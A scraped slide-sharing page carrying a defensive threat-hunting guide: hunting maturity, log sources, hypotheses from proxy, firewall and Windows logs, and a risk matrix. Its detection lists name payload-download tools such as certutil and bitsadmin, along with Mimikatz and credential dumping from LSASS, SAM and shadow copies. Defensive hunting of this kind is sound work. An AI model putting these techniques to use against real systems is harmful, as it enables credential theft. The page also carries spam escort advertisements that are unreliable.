The Fundamental of Secure Socket Layer (SSL)The Fundamental of Secure Socket Layer (SSL)
The Fundamental of Secure Socket Layer (SSL)
 
Hawkeye the Credential Theft Maalware
Hawkeye the Credential Theft MaalwareHawkeye the Credential Theft Maalware
Hawkeye the Credential Theft Maalware
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
Exploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web applicationExploiting parameter tempering attack in web application
Exploiting parameter tempering attack in web application
 
Mirroring web site using ht track
Mirroring web site using ht trackMirroring web site using ht track
Mirroring web site using ht track
 
Collecting email from the target domain using the harvester
Collecting email from the target domain using the harvesterCollecting email from the target domain using the harvester
Collecting email from the target domain using the harvester
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utility
 
Introduction ethical hacking
Introduction ethical hackingIntroduction ethical hacking
Introduction ethical hacking
 
Social engineering
Social engineeringSocial engineering
Social engineering
 

Dernier

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 

Dernier (20)

Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 

Threat Hunting Procedures and Measurement Matrice

  • 1. 1 | P a g e Table of Content CONTENTS INTRO TO HUNTING............................................................................................................................ 02 THREAT HUNTING MATURITY MODEL................................................................................................. 02 BASIC REQUIREMENT FOR THREAT HUNTING...................................................................................... 03 THE PYRAMID OF PAIN ....................................................................................................................... 04 IMPORTANCE OF THREAT INTELLIGENCE IN THREAT HUNTING ............................................................ 04 PROCESS TO CONDUCT THREAT HUNTING........................................................................................... 05 RISK RATING MEASUREMENT MATRIX ................................................................................................ 11
  • 2. 2 | P a g e Figure 1: A Successful Threat-hunting technique Threat Hunting Procedures 1. Intro to Hunting – What it is, Why It’s Important, Hunting is a proactive, hypothesis-based investigation process of cyber-attacks. Threat hunting is the human-driven, proactive and iterative search through networks, endpoints, or datasets to detect malicious, suspicious, or risky activities that have evaded detection by existing automated tools. Threat hunting has been around for a while, but it has only recently become a focus of modern enterprise Security Operation Centres (SOCs). Hunting can revolutionize the threat detection efforts of an organization, The purpose of hunting is specifically to find what is escaped by the automated alerting and monitoring systems. Hunting is searching for anomalies by patrolling through data, rather than investigating a call in from SIEM. It is also important to keep in mind that successful hunting is tied to capabilities in three different areas: 2. Threat Hunting Maturity Model As mentioned, there are many kinds of techniques and practices that an analyst can pursue in hunting. Hunting maturity is a measure of what kinds of techniques and data analyst can work with. To help assess the current hunting capabilities and determine how analyst should be aiming to grow them, below is the reference of the Hunting Maturity Model (HMM). (the Hunting Maturity Model is just a prescriptive model, and many organizations will sometimes be at varying levels of capabilities: excelling at some criteria and less advanced in others)
  • 3. 3 | P a g e Figure 2: Threat-hunting maturity model The Hunting Maturity Model describes five levels of an organization’s proactive detection capability. Each level of maturity corresponds to how effectively an organization can hunt based on the data they collect, their ability to follow and create data analysis procedures (DAP), and their level of hunting automation. The HMM can be used by analysts and managers to measure current maturity and provide a roadmap for improvement. Often these improvements focus on a combination of tools, processes, and personnel. 3. Basic Requirement for Threat Hunting Analytical Mindset: This is, without question, the most important skill an analyst can possess. Without the innate curiosity in and pursuit of the “huh … that’s weird,” an analyst can have all the data in the world, but they will inevitably find themselves missing pieces of the puzzle. The analyst needs to be able to make reasoned assumptions and chart a new course when the trail runs cold. Log Analysis: Logs from services and devices are just a couple of the most important and underutilized sources of intelligence for any security department. The ability to analyze logs for anomalies and pivot between data sources to see the big picture is a key competency. Network Forensics: The ability to read and understand packet capture data and determine the malicious nature of network traffic. If you’re fortunate enough to extend your NSM capabilities to the endpoint with an EDR product, a sound foundation in host-based forensics is key to compliment your network knowledge. Network Architecture: An understanding of different network devices and how they operate within the environment. Attacker Lifecycle: Understanding the different events that happen at any given stage in an attack lifecycle will better prepare your analysts to compartmentalize and prioritize their findings and activities.
  • 4. 4 | P a g e Figure 3: Pyramid of Pain – Threat-hunting Tools: This is an incredibly broad area, but at a foundational level, an understanding of how log aggregators ingest data as well as the function of packet capture analysis tools are essential for the analyst to understand. OS Architecture: Different operating systems represent different attack vectors. A strong grasp of Windows- and Linux-based operating systems is essential. Attack Methods: Exploit Kits, Malware, Phishing, and software misconfigurations. Understanding how an attacker attempts to penetrate your network is key to hunting for indicators of the behavior. 4. The Pyramid of Pain The Pyramid of Pain is the simple diagram shows the relationship between the types of indicators that analyst might use to detect an adversary’s activities and how much pain it will cause to analyst to detect the indicators of an incident/attack. 5. Importance of Threat Intelligence in Threat Hunting Threat Intelligence or Cyber Threat Intelligence (CTI) is a part of cybersecurity that focuses on the analysis and collection of information on both potential and current cyber-attacks that threaten the security of an organization or its assets. Cyber Threat Intelligence is a proactive security measure that prevents data or security breaches and saves the financial cost required to clean up such a mess after a breach.
  • 5. 5 | P a g e CTI’s main objective is to provide companies an in-depth understanding about the cyber-threats that poses the greatest risks to their infrastructure and how to protect their business in the long run Cyber threat intelligence gathers raw information about new and existing threat actors from many different sources. CTI teams then analyze the collected data to produce appropriate threat intelligence management and feeds reports full of only the most important information that can be utilized by automated security control solutions and management to make security decisions for the company. The fundamental purpose of this kind of security is that it helps to keep companies informed of the advanced threats and exploits. 6. Process to Conduct Threat Hunting Threat hunting process starts with collecting the logs of all the sources such as security solution, database, servers, application logs etc. the best and easy method to collect the logs is to use the log management device such as SIEM. After the collecting the logs and normalizing the logs the next step is to develop the hypothesis and apply on the output of data to start the hunting. I. Gathering Data: Collect, Normalize, Analyse The following are some of the types of logs that may be important to collect in the organization environment: • Configuration Management Database (CMDB) • Application/service logs • DHCP • Proxy • Web and Application Server • Active Directory/LDAP • Domain Name Service (DNS) • Application Firewall • Database Application and Transaction • Host-based logs • Host/Network IDS/IPS • Firewall • Antivirus • Host-based logs • Operating System (e.g., Windows Event and UNIX Syslog) • Endpoint Detection Response (EDR) • Virtual Machine Hypervisor • Network infrastructure logs • VPN • Router • Firewall • Load Balancer The below graphic is defining the data collection framework which is designed to help organizations focus on discovering and qualifying the security incidents and attack.
  • 6. 6 | P a g e Figure 4: Data Collection Framework II. Development of Hypothesis for Threat-hunting After collecting, normalizing and analyzing the data, then next step is to development the hypothesis and apply it on the output of data to start hunting. Below is the list of sources which helps to develops the advance threat hunting hypothesis: Internal Sources: internal sources are those data which generates in the boundary of an organisation such as past incidents, SIEM alerts, VA/PT reports etc. these data sources are very important and helpful for threat hunter to build the hypothesis. The hypothesis which are built on the internal data sources are very much effective and realistic. Below are some examples of internal sources: • Past incidents • Reconnaissance attempts against your infrastructure • Threats to specific line of business and industry verticals • Threats to customers’ intellectual property • VA/PT reports External Sources: the external sources for development of hypothesis are those data which are generates outside of the boundary of an organisation or data publish by the other vendors such as Threat intel feeds, TTP’s of an attack, OSINT, threat advisories, govt. advisories, etc. The hypothesis which are builds on the external sources are proactive hypothesis which are one step ahead then the monitoring system. Below are some examples of external sources:
  • 7. 7 | P a g e Figure 5: MITRE ATT&CK Refresher MIRTE ATT&CK Recent Developments: https://attack.mitre.org/resources/updates/ • Paid intelligence feeds • Open Source Intelligence (OSINT) • Partnerships with government agencies • Security Advisories • TTP of an attack • Cyber Kill Chain III. List of Threat-hunting Hypothesis Below is the list of some basic threat hunting hypothesis: 1. Proxy Logs Traffic Analysis Hypothesis I. Hypothesis: Bytes uploaded stats/Data upload Hunt For: Session uploaded data > 1 MB Possible Threat: Data exfiltration Format: Number of bytes, client IP, server IP, server port II. Hypothesis: Bytes downloaded stats/file download Hunt For: Session downloaded data > 3 MB Possible Threat: Attacker downloading attack tools Format: Number of bytes, client IP, server IP, server port III. Hypothesis: HTTP host header/traffic on malicious domain/URL categories Hunt For: Hosts not ending with .com | .net | .org & host length > 30 char Possible Threat: DGA, suspicious domains (i.e. http://bit.ly/2jKNAhi or HTTP traffic to an IP address instead of FQDN) Format: Traffic Count, HTTP host, URL Categories
  • 8. 8 | P a g e IV. Hypothesis: HTTP referrer header Hunt For: Malicious referring domains Possible Threat: Watering hole and JS exploit kits Format: Count, HTTP referrer, HTTP status code (302) V. Hypothesis: HTTP user-agent header Hunt For: Uncommon or non-existing User-Agents Possible Threat: Malicious traffic Format: Count, HTTP user-agent, HTTP status code VI. Hypothesis: HTTP request methods/Suspicious HTTP request Hunt For: Methods other than GET/POST Possible Threat: Uploads (PUT method), tunnelling (CONNECT method) and injection Format: traffic count, HTTP method VII. Hypothesis: HTTP number of requests/beaconing on suspicious domains Hunt For: Clients sending increasing number of HTTP requests Possible Threat: Beacons, tunnelling, and data exfiltration Format: Count of traffic, client IP, server IP, Domain name, HTTP status code 2. Firewall Traffic Analysis Hypothesis I. Hypothesis: SSH sessions Hunt For: Unexpected connections Possible Threat: Recon and lateral movements Format: Count of traffic, client IP, server IP, server port II. Hypothesis: RDP sessions/Unauthorized Remote desktop connection Hunt For: Unexpected RDP clients/servers Possible Threat: Lateral movements Format: Count of traffic, client IP, server IP, server port III. Hypothesis: IRC sessions/Suspicious malware communication Hunt For: IRC clients Possible Threat: C&C traffic and potential insider Format: Count of traffic, client IP, server IP, server port IV. Hypothesis: FTP sessions/Data exfiltration Hunt For: Unexpected FTP clients/server Possible Threat: Lateral movements or data exfiltration
  • 9. 9 | P a g e Format: Count of traffic, Client IP, Server IP, Server port V. Hypothesis: TCP listening ports on private IPs/Inbound Traffic on critical ports Hunt For: Unauthorized service Possible Threat: Backdoors Format: Count of sessions, TCP port, server IP, protocol VI. Hypothesis: TCP listening ports on public IPs/outbound connection on suspicious IP Hunt For: Abnormal port / protocol combination (i.e. non-HTTP carried over port 80) Possible Threat: Unauthorized communication channel Format: Count of sessions, TCP port, protocol 3. Antivirus Traffic Analysis Hypothesis I. Hypothesis: Continues Malware infection on system Hunt For: Recurring/Malware reinfection Possible Threat: Format: Virus name, infected file, File Hash value, count of infection II. Hypothesis: Uncleaned malware infection Hunt For: Uncleaned malware Possible Threat: New Malware/ransomware without signature Format: Action Taken, Virus name, infected file, File Hash value, count of infection 4. Windows logs Analysis Hypothesis I. Hypothesis: Details Tracking events/Process Creation Hunt For: suspicious Process Created by Attacker/malware Possible Threat: APT threat, New Malware Format: Event ID 4688, 4689, New process name, Creator Process Name, Logon ID, Account Name II. Hypothesis: User added to privilege group Hunt For: ATP Expansion/Privilege escalation Possible Threat: APT Attack/ Format: event id 4732, 4728, 4756, 4746, 4751, 4761, Account name, Logon ID, III. Hypothesis: Detection of Mimikatz Hunt For: Credential dumps Possible Threat: APT Attack/ Format: event ID 4688, 4689, event data image: lsass.exe, Mimikatz.exe.
  • 10. 10 | P a g e 5. Other Hunting Hypothesis • Hunt for File-less Malware • Hunt for Malware • Hunt for Lateral Movements • Hunt for Windows Event IDs • Hunt for group policy violations • Hunt for Network Beaconing • Hunt for Insider Privilege Escalation • Hunt for Privilege failures • Hunt for PowerShell Errors • Hunt for PowerShell Traces • Hunt for Login Failures on Critical Servers • Hunt for vulnerabilities • Hunt for Persistence Threats • Hunt for Registry violations • Hunt for Network traffic denied by firewalls or IPs • Hunt for Unusual DNS requests - either to malicious domains or internal flaws • Hunt for Signs of DDoS activity and geographic irregularities • Hunt for Mismatched port-application traffic • Hunt for Unusual north-south or east-west network traffic • Hunt for Anomalies • Hunt for Unknown Network Shares • Hunt for Network Recon tools • Hunt for brute force RDP attempts • Hunt for Suspicious File Types • Hunt for Windows Admin Shares • Hunt for RDP. PSEXEC, Task created, Task scheduled, WMI, Services created • Hunt for Parent/Child relationships - Process • Hunt for Parent/Child relationships - MS Office • Hunt for Parent/Child relationships - Cmd • Hunt for Parent/Child relationships - PowerShell • Hunt for Parent/Child relationships - Memory • Hunt for Process Injection • Hunt for Windows onelinersto download remote payload - below ref: • Possible tools: powershell.exe, wmic.exe, regsvr32, rundll32.exe, mshta.exe, regasm.exe, regsvc.exe, odbcconf.exe, msbuild.exe, certutil.exe, bitsadmin.exe • Hunt for Masquerading • Hunt for Privilege Escalation - Access token manipulation • Hunt for Privilege Escalation - Weak service permissions • Hunt for UAC Bypass • Hunt for Credential Dumping • Hunt for Credentials Dumping - Dump SAM/SECURITY registry hives • Hunt for Credentials Dumping - Shadow Copies • Hunt for Mimikatz cmds / Hunting DCShadow • Hunt for Credentials Dumping - LSASS memory access
  • 11. 11 | P a g e • Hunt for Suspicious Services. Services that run executables from %systemroot%. • Hunt for Suspicious Services. Services that run PowerShell • Hunt for Beaconing • Hunt for BOT Activity • Hunt for Malicious Domains & DNS Tunneling 7. Risk Rating Measurement Matrix This rating is reserved for threats that will result in an impact to the organization. HIGH A threat is categorized as HIGH if: • it involves critical organization assets • attempts to evade standard signature-based detections • exfiltrates data outside the organization • attempts to create a communication link with external Command & Control • it results in direct reputational or financial loss for the organization MEDIUM A threat is categorized as MEDIUM if: • it involves limited infections at endpoints • malwares on system which cannot be cleaned/deleted/quarantined • attempts to connect externally which get blocked • access to suspicious domains or IP addresses LOW A threat is categorized as LOW if: • if it involves attempts of attacks from external sources • threats related security misconfiguration in systems • access to non-standard or non-business domains or IP addresses • involves installation of unnecessary applications (not necessarily malicious) Prepared By: -Vishal Kumar Threat Analyst